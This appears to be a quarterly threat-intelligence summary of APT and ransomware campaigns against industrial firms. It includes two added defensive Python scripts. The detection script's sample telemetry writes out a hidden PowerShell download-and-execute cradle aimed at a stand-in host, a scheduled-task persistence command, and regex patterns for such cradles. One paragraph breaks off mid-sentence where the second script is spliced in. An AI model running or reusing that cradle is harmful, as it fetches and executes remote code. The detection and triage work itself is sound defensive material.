APT and financial attacks on industrial organizations in Q1 2026

Kaspersky.com
https://ics-cert.kaspersky.com/publications/reports/2026/05…


21 May 2026

This summary provides an overview of reports on APT and financial attacks on industrial enterprises disclosed in Q1 2026, as well as the related activities of groups observed attacking industrial organizations. For each topic, we summarize the key facts, findings and conclusions of researchers that we believe may be useful to professionals addressing practical issues of cybersecurity in industrial enterprises.

Quarterly summary

After analyzing technical papers relating to attacks on industrial enterprises published in Q1 2026 by cybersecurity research teams, it can be assumed that some of the alarming discoveries from the previous quarter – Q4 2025 – may signify new trends in the evolution of the threat landscape. One such new trend is cyberattacks on transportation and logistics companies aimed at physically stealing goods. The previously unknown Armenian-speaking group Diesel Vortex has chosen this cyber-physical method to monetize attacks on freight operators and logistics organizations in the USA and Europe. Another alarming trend that appears to be becoming part of everyday reality is the use of cyberattacks to gather information for planning and evaluating the effectiveness of military strikes. This appears to be evidenced by a Check Point Research publication. Some trends in the evolving threat landscape are driven by technical factors, such as the retooling of industrial enterprises and the latest technological advances that promise increased efficiency. For example, the growing popularity of Linux platforms is leading to an increased diversity of malicious tools designed for these platforms. In line with current technological advances, the number of cases involving the use of artificial intelligence in malware development and other stages of attacks targeting industrial enterprises is inevitably increasing.
It has been almost 16 years since the first publications about Operation Olympic Games, better known as Stuxnet, which ushered in the era of cyber-physical attacks. It became clear then that the genie could not be put back in the bottle. Everyone expected new operations of this kind, perhaps even more technically complex, large-scale, and daring. However, there was no significant continuation that lived up to this expectation. Publications about new attacks were rare, and the malicious campaigns themselves were increasingly straightforward, with less sophisticated tools. The number of such campaigns was likely limited by factors of interstate relations, and the rejection of complex tools appears to have been largely dictated by rational and technical considerations. It has become apparent that industrial automation systems are much more vulnerable to attack than was believed just 10 years ago. Currently, most incidents involving cyberattacks on key production assets are caused by trivial information security issues within the affected organizations – as described by CERT Polska. However, as international political instability grows, the number of such incidents is increasing, the geographic scope of operations is expanding, and new players, sometimes associated with unexpected countries, are entering the arena.

Targets in Russia

Head Mare attacks

Cybercriminal | Spear phishing | Compromised legitimate mailboxes | Exploitation of public-facing applications | Backdoor | Replacement of legitimate applications

F6 researchers discovered a wave of malicious emails from the PhantomCore group (aka Head Mare), which they detected on January 19 and 21, 2026. The attackers used legitimate email addresses for their mailings, which suggests that these addresses may have been compromised. The campaign targeted Russian organizations in the housing utilities, finance, e-commerce, B2C, municipal services, aerospace, chemical, construction, manufacturing, and marketplace industries.
The emails had the subject “?? ?? ????????????” (“Specifications for Approval”) and included an attachment called “?? ?? ???????????? ?? 54 ?? 19.01.26.zip” (“Specifications for Approval Sat 54 from 01/19/26.zip”) containing DOC and LNK files. The .doc file in the ZIP archive was a RAR archive containing a directory with the same name that contained files related to the actual document. After launching the LNK file, a cmd command was executed, initiating the download and execution of a PowerShell script. This script downloaded and displayed the decoy document, loaded the next-stage PowerShell script into memory, and established persistence for the next-stage script in Windows Task Scheduler. This next-stage PowerShell script was virtually identical to PhantomCore.PollDL (PhantomRemote).

At the end of 2025, Kaspersky analysts identified a new malicious campaign targeting organizations in Russia in the government, construction, and manufacturing sectors that they attributed to the Head Mare threat group. The campaign continued into early 2026. As part of this activity, the group once again expanded its toolset by introducing a new PowerShell-based backdoor named PhantomHeart. Initially distributed as a DLL, it was later reworked into a PowerShell script. PhantomHeart implements a remote access channel that combines HTTP communication with the C2 and the ability to deploy an SSH tunnel upon request. Its persistence mechanism is activated by launching via the task scheduler under the guise of a legitimate update script located in the LiteManager directory. The researchers also discovered that the group repurposed the previously known PhantomProxyLite tool and implemented it as a PowerShell script. The intrusion chain included the exploitation of the BDU:2025-10114 TrueConf vulnerability. In some cases, the group still used phishing emails.
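The shortcut-to-PowerShell-to-Task-Scheduler chain in the two Head Mare campaigns above (an LNK launch, cmd.exe starting a PowerShell download cradle, persistence registered as a scheduled task) is a pattern a SOC can correlate from ordinary process-creation telemetry. The script below is an added example written for this summary, not code from Kaspersky, F6 or any of the reports it cites. It runs over a constructed set of Sysmon-style process events (host names, PIDs, the 198.51.100.7 address and the task name are all made up for the demo) and raises one alert per PowerShell process that fetches a remote stage after being launched from Explorer, escalating the alert when a schtasks /create descendant follows within a time window. The same scheduled-task persistence recurs in the Vortex Werewolf and Toy Ghouls sections later in this summary, so the same correlation applies there.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ProcEvent:
    """One process-creation record in a flattened Sysmon-style shape."""
    ts: int          # seconds since epoch
    host: str
    pid: int
    ppid: int
    image: str       # image file name, lower-case
    cmdline: str


# Download-cradle verbs and stealth switches commonly seen in one-line PowerShell stagers
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|"
    r"start-bitstransfer|\biex\b|invoke-expression", re.I)
STEALTH_FLAGS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:p|xecutionpolicy)?\s+bypass|-enc(?:odedcommand)?\b|-nop\b", re.I)
TASK_CREATE = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create", re.I)


def _ancestors(ev: ProcEvent, idx: Dict[Tuple[str, int], ProcEvent], max_depth: int = 5) -> List[ProcEvent]:
    """Walk the parent chain on the same host, nearest parent first."""
    chain, cur = [], ev
    for _ in range(max_depth):
        parent = idx.get((cur.host, cur.ppid))
        if parent is None:
            break
        chain.append(parent)
        cur = parent
    return chain


def detect_lnk_chains(events: List[ProcEvent], window: int = 900) -> List[dict]:
    """Alert on PowerShell download cradles launched from Explorer (how a double-clicked LNK runs),
    and escalate when a scheduled task is created by a descendant within `window` seconds."""
    idx = {(e.host, e.pid): e for e in events}
    alerts = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.image != "powershell.exe" or not DOWNLOAD_CRADLE.search(ev.cmdline):
            continue
        parents = [p.image for p in _ancestors(ev, idx)]
        if "explorer.exe" not in parents[:2]:      # explorer > powershell, or explorer > cmd > powershell
            continue
        launch = parents[:parents.index("explorer.exe") + 1]
        reasons = ["download cradle launched from " + " > ".join(reversed(launch))]
        if STEALTH_FLAGS.search(ev.cmdline):
            reasons.append("hidden window / execution policy bypass switches")
        for other in events:
            if (other.host == ev.host and ev.ts <= other.ts <= ev.ts + window
                    and TASK_CREATE.search(other.cmdline)
                    and any(a.pid == ev.pid for a in _ancestors(other, idx))):
                reasons.append(f"scheduled task created by descendant pid {other.pid}")
        severity = "high" if any(r.startswith("scheduled task") for r in reasons) else "medium"
        alerts.append({"host": ev.host, "pid": ev.pid, "severity": severity, "reasons": reasons})
    return alerts


# Constructed sample telemetry (hosts, PIDs, address and task name are made up for the demo)
SAMPLE_EVENTS = [
    ProcEvent(100, "ws-17", 1200, 900, "explorer.exe", "C:\\Windows\\explorer.exe"),
    # benign: a user opens a command prompt and lists a directory
    ProcEvent(110, "ws-17", 2300, 1200, "cmd.exe", "cmd.exe /c dir"),
    # suspicious: shortcut-style launch, cmd.exe hands off to a PowerShell download cradle
    ProcEvent(120, "ws-17", 4188, 1200, "cmd.exe",
              'cmd.exe /c powershell -w hidden -ep bypass -c "iex (iwr http://198.51.100.7/stage1)"'),
    ProcEvent(121, "ws-17", 4192, 4188, "powershell.exe",
              'powershell -w hidden -ep bypass -c "iex (iwr http://198.51.100.7/stage1)"'),
    # persistence: the downloaded stage registers a scheduled task
    ProcEvent(130, "ws-17", 4210, 4192, "schtasks.exe",
              'schtasks.exe /create /tn "Updater" /sc minute /mo 15 /tr "powershell -f C:\\Users\\Public\\u.ps1"'),
    # benign admin PowerShell on another host: no cradle, no Explorer parent
    ProcEvent(140, "srv-02", 3001, 700, "powershell.exe", "powershell -c Get-Service"),
]


if __name__ == "__main__":
    for alert in detect_lnk_chains(SAMPLE_EVENTS):
        print(alert)
```

A real deployment would read Sysmon Event ID 1 (or the EDR equivalent) instead of the inline list, and should additionally watch Security event 4698 ("a scheduled task was created"), because persistence registered through the Register-ScheduledTask cmdlet runs inside the PowerShell process and never spawns schtasks.exe.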
Kaspersky researchers also discovered a large-scale phishing campaign by the Head Mare group, this time using a new version of the PhantomCore (PhantomDL) backdoor. This new Head Mare campaign affected several hundred users from Russian organizations, including in the public sector and companies from the logistics, financial, and industrial sectors. Recipients received emails purporting to be from a research organization offering contracts. The attachments contained encrypted archives with a series of LNK files that automatically launched the process of downloading and installing a backdoor. When any of the shortcuts was launched, a command was executed to download an intermediate script written in PowerShell located on the attackers’ server. This script downloaded a new variant of PhantomCore written in C++ from a remote server, then downloaded and opened a decoy document, ensuring persistence in the system and enabling autorun. Persistence was achieved using the PSFactoryBuffer COM hijacking technique. The primary function of the new PhantomCore variant is to provide the attackers with a remote command prompt on the infected system. Once launched, the backdoor sends two POST requests to the C2 containing JSON data. In response, the attackers transmit a sequence of commands for the backdoor, including the command to download and unpack an archive. The archive contains a module for running ssh.exe, written in Golang. The module’s persistence is achieved in the system using a scheduler task.

In March, Kaspersky researchers reported a new malware campaign by the Head Mare group targeting educational and scientific institutions, as well as energy sector organizations in Russia. The activity was detected in February 2026, but the campaign itself had been active since at least December 2025. Victims received a link inviting them to join a video conference. After clicking it, they were prompted to install a service to connect to the video call.
During the installation process, the system was infected when a previously unknown backdoor named PhantomPxPigeon was installed on the victims’ machines. At the time of the report’s publication, the researchers also observed a new wave of similar activity, specifically a number of compromised TrueConf servers at various organizations in the transportation sector, as well as at scientific and educational institutions. The TrueConf client application distributions downloaded from these servers were replaced with malicious ones. The attack vector that led to the client application being replaced was unclear, but the attackers presumably exploited vulnerability BDU:2025-10116, identified by researchers and patched by the vendor in August 2025. The malicious distributions detected by Kaspersky did not have a valid digital signature.

Stan Ghouls attacks

Cybercriminal | Spear phishing | RAT | Backdoor | Linux malware

The Stan Ghouls group (also known as Bloody Wolf) has been orchestrating targeted attacks against organizations within the Russian Federation, Kyrgyzstan, Kazakhstan, and Uzbekistan since at least 2023. This group is known for its well-prepared attacks tailored to specific victims, primarily from the manufacturing, finance, and IT sectors, specialized Java-based malicious downloaders, and substantial infrastructure with dedicated resources allocated for specific campaigns. Kaspersky researchers revealed that the group initiated new campaigns against more than 50 victims in Uzbekistan and a limited number of victims in the Russian Federation, Kazakhstan, Turkey, Serbia and Belarus, though the latter three were likely collateral damage. Researchers analyzed the group’s latest campaign and observed changes to the attackers’ infrastructure, including newly identified domains. The group used phishing emails containing malicious PDF attachments. Previously, Stan Ghouls utilized the malicious remote access Trojan (RAT) STRRAT (Strigoi Master) as its primary payload.
However, last year the group shifted its focus and began employing legitimate software – NetSupport – as its tool of choice. Indicators suggesting that this group has incorporated Mirai IoT malware into its arsenal were also identified.

Vortex Werewolf attacks

New threat actor | APT | Spear phishing | Telegram phishing | Phishing websites | Cloud services infrastructure | Tor network

In December 2025 and January 2026, BI.ZONE researchers detected malicious activity from a new Vortex Werewolf (aka SkyCloak) cluster targeting Russian organizations in the public administration and defense industries. Cyble and Seqrite reported that Vortex Werewolf had previously targeted Belarusian government and defense structures as well. According to network infrastructure research, Vortex Werewolf has been active since at least December 2024. The attackers use Cloudflare in their network infrastructure. The initial access method could not be determined, but it is believed that the attackers delivered malware via phishing emails and directly through the Telegram messenger. Victims were sent a link disguised as a Telegram address to download a document – an archive containing a malicious LNK file and an additional archive containing a set of files, including a PowerShell script. The phishing page simulated the process of downloading a file and initiated a procedure to restore access to the Telegram account. Users were asked to confirm their country code and enter their phone number, after which a confirmation code was sent to their Telegram app. If two-factor authentication was enabled for the account, the victim was also asked to enter their cloud password. This allowed Vortex Werewolf to obtain an active session of the user’s Telegram account. To increase the credibility of the attack, in some cases the attackers placed a decoy document on the phishing page with intentionally blurred content.
The Vortex Werewolf group uses GitHub Pages to host static JavaScript and CSS resources, with a separate repository containing those resources created for each phishing domain. After successfully verifying the entered code and password with two-factor authentication enabled, a link is generated. Clicking the link initiates the download of a ZIP archive hosted on Dropbox that contains an LNK file. Following a successful compromise, Tor and OpenSSH are installed on the system, using obfs4 bridges rather than public Tor entry nodes to communicate with the control infrastructure. Remote access is also configured through the Tor network using RDP, SMB, SFTP, and SSH. The malware persists in the Windows Task Scheduler by creating tasks. Researchers note that Vortex Werewolf resembles the Core Werewolf group (aka Awaken Likho). The clusters have similar targets and attack regions, and use SSH to establish remote access to compromised systems, as well as military-related decoy documents. However, BI.ZONE did not have sufficient data to definitively attribute Vortex Werewolf to Core Werewolf, so this activity is considered a separate threat cluster.

Toy Ghouls attacks

Cybercriminal | Ransomware | Linux malware | Exploitation of public-facing applications | Trusted relationship

Toy Ghouls (also known as Bearlyfy or laboo.boo) is a financially motivated group active since at least January 2025. The group exclusively targets Russian organizations with ransomware from the LockBit and RedAlert families for Windows systems, and Babuk for Linux and ESXi. The main industries targeted by the attackers are manufacturing, construction, automotive, and telecommunications. There are also indications of possible connections to the Head Mare group, based on the use of the same tools and network infrastructure. Kaspersky researchers analyzed their techniques and procedures using a unified kill chain methodology.
A common initial access vector involves third-party contractors, where the attackers leverage stolen user certificates to authenticate to a customer’s VPN. After establishing VPN access, they use RDP to connect to internal systems and traverse the victim’s environment further. The Toy Ghouls group often exploits vulnerable 1C servers by uploading 1C-Shells via separate .epf files. To discover the internal network, the attackers use SoftPerfect Network Scanner and fscan, which can search for and exploit vulnerabilities. Toy Ghouls uses scheduled tasks to execute its activities on compromised hosts, PowerShell to execute malicious scripts, the Windows command shell to execute commands on Windows, and Bash to execute commands on *nix systems.

F6 researchers also tracked the latest activity of the Bearlyfy/Toy Ghouls group, which has carried out over 70 attacks on Russian companies since its emergence. Bearlyfy initially used LockBit 3 Black for Windows and its own modified version of the Babuk ransomware to encrypt data on Linux systems. Since May 2025, several attacks have used a slightly modified version of the PolyVice ransomware from the well-known RaaS Vice Society. According to F6, since March 2026, Bearlyfy began using its own ransomware program for Windows called GenieLocker. Its cryptographic scheme and approaches are clearly borrowed from the Venus/Trinity families of ransomware. F6 believes the malware a
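The replaced TrueConf client distributions in the Head Mare section of this summary lacked a valid digital signature, which suggests a cheap triage step for any installer pulled from an on-premises conferencing or update server: before it is deployed, check that the file is one of the builds captured out of band from the vendor, and that it at least carries an embedded Authenticode certificate table. The script below is an added example for this summary, not Kaspersky's, TrueConf's or any vendor's code. It parses the security data directory of the PE optional header (presence only; validating the signature chain and signer identity still has to be done with the platform signature API, for instance Get-AuthenticodeSignature on Windows) and pins SHA-256 hashes of known-good builds. The minimal PE images it builds are constructed test fixtures with a dummy certificate table, not real installers.

```python
import hashlib
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4  # index of the certificate table among the PE data directories


def authenticode_directory(data: bytes):
    """Return (file_offset, size) of the PE certificate table, or None if the image has none.

    Presence of the table only says the file carries *some* signature; validating the chain
    and the signer must still be done with the platform's signature API.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    (size_of_optional,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == 0x10B:        # PE32
        count_off, dirs_off = 92, 96
    elif magic == 0x20B:      # PE32+
        count_off, dirs_off = 108, 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    (count,) = struct.unpack_from("<I", data, opt + count_off)
    entry = opt + dirs_off + IMAGE_DIRECTORY_ENTRY_SECURITY * 8
    if count <= IMAGE_DIRECTORY_ENTRY_SECURITY or entry + 8 > opt + size_of_optional:
        return None
    offset, size = struct.unpack_from("<II", data, entry)   # for this directory the VA is a file offset
    if offset == 0 or size == 0 or offset + size > len(data):
        return None
    return offset, size


def triage_installer(data: bytes, pinned_sha256: set) -> dict:
    """Decide whether a downloaded installer may be deployed."""
    digest = hashlib.sha256(data).hexdigest()
    signed = authenticode_directory(data) is not None
    pinned = digest in pinned_sha256
    if pinned:
        verdict = "allow"    # byte-identical to a vendor build captured out of band
    elif not signed:
        verdict = "block"    # unknown build with no signature at all: quarantine and alert
    else:
        verdict = "review"   # signed but not pinned: validate the chain, then pin or reject
    return {"sha256": digest, "signed": signed, "pinned": pinned, "verdict": verdict}


def build_sample_pe(cert_offset: int = 0, cert_size: int = 0) -> bytes:
    """Construct a minimal, non-runnable PE32+ image as a test fixture (not a real installer)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)          # 64-byte DOS header
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x22)           # AMD64, 240-byte optional header
    dirs = [(0, 0)] * 16
    dirs[IMAGE_DIRECTORY_ENTRY_SECURITY] = (cert_offset, cert_size)
    opt = struct.pack("<H", 0x20B) + b"\0" * 106 + struct.pack("<I", 16)   # magic, padding, NumberOfRvaAndSizes
    opt += b"".join(struct.pack("<II", va, sz) for va, sz in dirs)
    image = dos + b"PE\0\0" + coff + opt
    if cert_size:
        # Dummy certificate table: zero bytes standing in for a WIN_CERTIFICATE blob
        image = image.ljust(cert_offset, b"\0") + b"\0" * cert_size
    return image


if __name__ == "__main__":
    unsigned = build_sample_pe()
    signed = build_sample_pe(cert_offset=512, cert_size=64)
    known_good = {triage_installer(signed, set())["sha256"]}   # hash captured from the vendor build
    for name, blob in (("unsigned-unknown", unsigned), ("signed-pinned", signed)):
        print(name, triage_installer(blob, known_good))
```

The pinned-hash set is the control that actually stops a swapped distribution: it must be populated from the vendor's own download channel, never from the server being checked, otherwise a replaced build would simply pin itself.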
